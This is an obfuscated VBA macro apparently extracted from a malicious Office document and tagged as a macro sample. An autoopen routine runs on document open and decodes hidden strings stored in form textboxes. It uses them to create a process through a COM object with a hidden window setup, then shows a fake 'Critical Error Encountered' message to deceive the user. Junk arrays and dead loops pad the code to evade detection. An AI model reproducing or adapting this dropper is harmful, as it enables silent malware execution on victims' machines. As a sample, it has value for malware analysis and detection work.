Attribute VB_Name = "Fneglfeuttxu"
Function Hhliqeexeesjx()
On Error Resume Next
   'Lufzoofn
Vvfmgrij = 677968 + 1
      Dim RAKlACF()
ReDim RAKlACF(1)
RAKlACF(0) = "Voluptatem."

      While 677968 = Vvfmgrij
         Dim eLiashBJ()
ReDim eLiashBJ(2)
eLiashBJ(0) = DYGDJY
eLiashBJ(1) = vXvzA

      Wend
      Dim JGbgICFt()
ReDim JGbgICFt(3)
JGbgICFt(0) = Allison
JGbgICFt(1) = "Fugit nihil nesciunt delectus."
JGbgICFt(2) = Grace

'Cnizxsgepo
Buuhdjirz = Gryoikbjp(Jvbtlxdvqrc.Kvnyrnrfwxtv)
   'Ynzfvyccyf
Vvfmgrij = 677968 + 1
      Dim PVQfB()
ReDim PVQfB(3)
PVQfB(0) = "Est."
PVQfB(1) = VlnMDLYV
PVQfB(2) = 4389

      While 677968 = Vvfmgrij
         Dim fIaMEVmCI()
ReDim fIaMEVmCI(1)
fIaMEVmCI(0) = "Reiciendis."

      Wend
      Dim PwNqGLD()
ReDim PwNqGLD(2)
PwNqGLD(0) = "Delectus."
PwNqGLD(1) = "Nesciunt debitis."

'Yqwzrtmdaigf
Set Kgvxzuqol = CreateObject(Gryoikbjp(Jvbtlxdvqrc.Kvnyrnrfwxtv + Ftnzyltj.Cxlgmqjyyj + Ftnzyltj.Gqxbcubjyvyc))
   'Oylcdzlpvt
Vvfmgrij = 677968 + 1
      Dim QqUBeiR()
ReDim QqUBeiR(3)
QqUBeiR(0) = "Laboriosam quia atque."
QqUBeiR(1) = XAXdhn
QqUBeiR(2) = "Nemo."

      While 677968 = Vvfmgrij
         Dim xiycEITD()
ReDim xiycEITD(3)
xiycEITD(0) = "A vel."
xiycEITD(1) = "Consequuntur autem."
xiycEITD(2) = IyCrtDrM

      Wend
      Dim vLqaaGg()
ReDim vLqaaGg(1)
vLqaaGg(0) = "Modi consequatur distinctio."

'Xfeniohcn
Kgvxzuqol.XSize = Pjizhprzunzde + Psgrfaqzdhu + Tylbrhvv
   'Rxawhnoo
Vvfmgrij = 677968 + 1
      Dim BrMoK()
ReDim BrMoK(1)
BrMoK(0) = qzrbooC

      While 677968 = Vvfmgrij
         Dim FIrYtpiHA()
ReDim FIrYtpiHA(2)
FIrYtpiHA(0) = Mildred
FIrYtpiHA(1) = iAQSOqGH

      Wend
      Dim TxmvQFI()
ReDim TxmvQFI(2)
TxmvQFI(0) = "Beatae."
TxmvQFI(1) = vzMZBFBU

'Uprshoprtjk
Kgvxzuqol.YSize = Wummmnvsokf + Pmjuzkes + Pfwbylwmtnejx
   'Lyslvvmntnm
Vvfmgrij = 677968 + 1
      Dim rjmPEFEJh()
ReDim rjmPEFEJh(3)
rjmPEFEJh(0) = "Voluptas."
rjmPEFEJh(1) = "Est."
rjmPEFEJh(2) = "Sint."

      While 677968 = Vvfmgrij
         Dim BgTSCB()
ReDim BgTSCB(1)
BgTSCB(0) = Antonio

      Wend
      Dim stJCDbe()
ReDim stJCDbe(3)
stJCDbe(0) = 367
stJCDbe(1) = "Nisi."
stJCDbe(2) = Barbara

'Hhwbnttrd
Taqpwdemo = Gryoikbjp(Ftnzyltj.Gqxbcubjyvyc + Jvbtlxdvqrc.Xlezjyzllr + Jvbtlxdvqrc.Dtzafgbe)
   'Ccofvyfgenidz
Vvfmgrij = 677968 + 1
      Dim jJVkAREYd()
ReDim jJVkAREYd(3)
jJVkAREYd(0) = Pete
jJVkAREYd(1) = "Amet provident."
jJVkAREYd(2) = "Quasi."

      While 677968 = Vvfmgrij
         Dim EzfcHGgIC()
ReDim EzfcHGgIC(3)
EzfcHGgIC(0) = Seth
EzfcHGgIC(1) = 5437
EzfcHGgIC(2) = 207

      Wend
      Dim RhQfG()
ReDim RhQfG(3)
RhQfG(0) = "Quo ea consequatur."
RhQfG(1) = Nicolas
RhQfG(2) = 1

'Udyvxnqxdgfg
Ovcdfxpmn = CreateObject(Gryoikbjp(Buuhdjirz)).Create#(Taqpwdemo, Dliofiwdvwo, Kgvxzuqol, Wlwvjxwgqmx)
   'Tgfgdlfknejdl
Vvfmgrij = 677968 + 1
      Dim kHoTQQHCa()
ReDim kHoTQQHCa(2)
kHoTQQHCa(0) = pEEBHL
kHoTQQHCa(1) = "Sequi."

      While 677968 = Vvfmgrij
         Dim siJdCAAP()
ReDim siJdCAAP(3)
siJdCAAP(0) = Cecil
siJdCAAP(1) = DFsUTl
siJdCAAP(2) = "Et."

      Wend
      Dim cWIVABEA()
ReDim cWIVABEA(3)
cWIVABEA(0) = Lyle
cWIVABEA(1) = "Nulla."
cWIVABEA(2) = Willie

'Uwtsteuv
End Function
Attribute VB_Name = "Ftnzyltj"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Nvfbzfbi, 0, 0, MSForms, TextBox"
Attribute VB_Control = "Cxlgmqjyyj, 1, 1, MSForms, TextBox"
Attribute VB_Control = "Gqxbcubjyvyc, 2, 2, MSForms, TextBox"
Attribute VB_Control = "Mnwzbtwcss, 3, 3, MSForms, TextBox"
Attribute VB_Name = "Jkxjtopwg"
Function Gryoikbjp(Hbkbivkpbnqsi)
On Error Resume Next
   'Ywgqoems
Vvfmgrij = 677968 + 1
      Dim IxJYWFIBf()
ReDim IxJYWFIBf(2)
IxJYWFIBf(0) = PJmVGJAIX
IxJYWFIBf(1) = Saul

      While 677968 = Vvfmgrij
         Dim euYyDHTH()
ReDim euYyDHTH(1)
euYyDHTH(0) = 7094

      Wend
      Dim MKTmGI()
ReDim MKTmGI(2)
MKTmGI(0) = "Vitae."
MKTmGI(1) = Timothy

'Xyneoegtqr
Gryoikbjp = Fgkobqldcj(Fgkobqldcj(Fgkobqldcj(Fgkobqldcj(Hbkbivkpbnqsi))))
   'Lginihxkhk
Vvfmgrij = 677968 + 1
      Dim riTJCGF()
ReDim riTJCGF(2)
riTJCGF(0) = FntRDER
riTJCGF(1) = "In."

      While 677968 = Vvfmgrij
         Dim cvbAGCMP()
ReDim cvbAGCMP(3)
cvbAGCMP(0) = Mario
cvbAGCMP(1) = Blanche
cvbAGCMP(2) = MKyYtxB

      Wend
      Dim QzMgAIH()
ReDim QzMgAIH(1)
QzMgAIH(0) = "Quia."

'Zsercnia
End Function
Attribute VB_Name = "Jvbtlxdvqrc"
Attribute VB_Base = "0{84DECD78-0F66-4614-AD10-CB8ACB23A35C}{CF75A700-83CA-484C-96CE-4C3DAAFC2D73}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Poxwyekjff"
Function Fgkobqldcj(Spmiabst)
On Error Resume Next
   'Oxctgnaoe
Vvfmgrij = 677968 + 1
      Dim TDHdF()
ReDim TDHdF(2)
TDHdF(0) = Opal
TDHdF(1) = 37

      While 677968 = Vvfmgrij
         Dim DXiIkFFQE()
ReDim DXiIkFFQE(2)
DXiIkFFQE(0) = NDUlPf
DXiIkFFQE(1) = "Quod."

      Wend
      Dim nexSFEQC()
ReDim nexSFEQC(1)
nexSFEQC(0) = "Est."

'Cgyycsqbff
Jsoxixvcpj = LTrim("      ")
   'Jkhxasyljtnja
Vvfmgrij = 677968 + 1
      Dim vlcfCtUH()
ReDim vlcfCtUH(3)
vlcfCtUH(0) = YtnAFAKB
vlcfCtUH(1) = 8
vlcfCtUH(2) = zBgJDD

      While 677968 = Vvfmgrij
         Dim ehPdLYIH()
ReDim ehPdLYIH(1)
ehPdLYIH(0) = GtLXjJA

      Wend
      Dim rcsfD()
ReDim rcsfD(1)
rcsfD(0) = "Veritatis."

'Punydbrhkbjf
Vzrrnqap = Ftnzyltj.Nvfbzfbi
ReDim iJhhshKKsd(3245)
   'Lkykkznf
Vvfmgrij = 677968 + 1
      Dim lCDeA()
ReDim lCDeA(2)
lCDeA(0) = 284
lCDeA(1) = "Libero."

      While 677968 = Vvfmgrij
         Dim uvPfxGGGr()
ReDim uvPfxGGGr(2)
uvPfxGGGr(0) = Brandon
uvPfxGGGr(1) = Erma

      Wend
      Dim BLkjHuoFh()
ReDim BLkjHuoFh(2)
BLkjHuoFh(0) = Edgar
BLkjHuoFh(1) = "Corporis."

'Asiglmqcjaob
iJhhshKKsd(234) = Replace(Spmiabst, Vzrrnqap, Jsoxixvcpj)
   'Awpmnneeoedfo
Vvfmgrij = 677968 + 1
      Dim TDHyB()
ReDim TDHyB(1)
TDHyB(0) = "Quis."

      While 677968 = Vvfmgrij
         Dim XaVHq()
ReDim XaVHq(2)
XaVHq(0) = "Similique."
XaVHq(1) = "Et."

      Wend
      Dim DwcGG()
ReDim DwcGG(3)
DwcGG(0) = "Laboriosam consequatur sunt aspernatur."
DwcGG(1) = "Aliquam est voluptatem."
DwcGG(2) = Pauline

'Bhozjarmvqfm
Fgkobqldcj = iJhhshKKsd(234)
   'Exburvyjhqfhz
Vvfmgrij = 677968 + 1
      Dim ZMXUHBGC()
ReDim ZMXUHBGC(1)
ZMXUHBGC(0) = LoEYAU

      While 677968 = Vvfmgrij
         Dim WjzBEBAV()
ReDim WjzBEBAV(1)
WjzBEBAV(0) = "Deleniti."

      Wend
      Dim BVSKADP()
ReDim BVSKADP(3)
BVSKADP(0) = QsnDlHFF
BVSKADP(1) = 9
BVSKADP(2) = "Cupiditate."

'Quxjjgrbitjvm
End Function
Sub autoopen()
On Error Resume Next
   'Qjuepiebhca
Vvfmgrij = 677968 + 1
      Dim HvHpB()
ReDim HvHpB(3)
HvHpB(0) = "Commodi."
HvHpB(1) = "Mollitia nemo."
HvHpB(2) = "Ipsam."

      While 677968 = Vvfmgrij
         Dim IAIsjFoDB()
ReDim IAIsjFoDB(1)
IAIsjFoDB(0) = "Excepturi ut."

      Wend
      Dim TGIaJHFy()
ReDim TGIaJHFy(2)
TGIaJHFy(0) = 8
TGIaJHFy(1) = Edmond

'Ftlierrg
Hhliqeexeesjx
   'Joauvzbrqe
Vvfmgrij = 677968 + 1
      Dim KncZd()
ReDim KncZd(1)
KncZd(0) = "Beatae placeat sed."

      While 677968 = Vvfmgrij
         Dim ClPkHqLBO()
ReDim ClPkHqLBO(3)
ClPkHqLBO(0) = 5264
ClPkHqLBO(1) = "Sunt."
ClPkHqLBO(2) = 7

      Wend
      Dim uAtkIFpc()
ReDim uAtkIFpc(1)
uAtkIFpc(0) = vfavHI

'Lrglibmwiihok
Taqpwdemo = MsgBox(Gryoikbjp("oksmoksmCroksmioksmtioksmcaoksml Eoksmrrooksmr Eoksmncounoksmteoksmreoksmdoksmoksm"), Gryoikbjp("oksm1oksm6"), Jvbtlxdvqrc.Wzfibdlyst)
   'Rvgjxdnocprxc
Vvfmgrij = 677968 + 1
      Dim HiZYGQ()
ReDim HiZYGQ(3)
HiZYGQ(0) = Sylvester
HiZYGQ(1) = Jenna
HiZYGQ(2) = "Omnis."

      While 677968 = Vvfmgrij
         Dim ggTmFbjH()
ReDim ggTmFbjH(2)
ggTmFbjH(0) = "Vel perferendis aliquid."
ggTmFbjH(1) = Ana

      Wend
      Dim aUklcEcID()
ReDim aUklcEcID(2)
aUklcEcID(0) = "Molestias."
aUklcEcID(1) = wETWV

'Kuwmlwhpjuc
End Sub


INQUEST-PP=macro
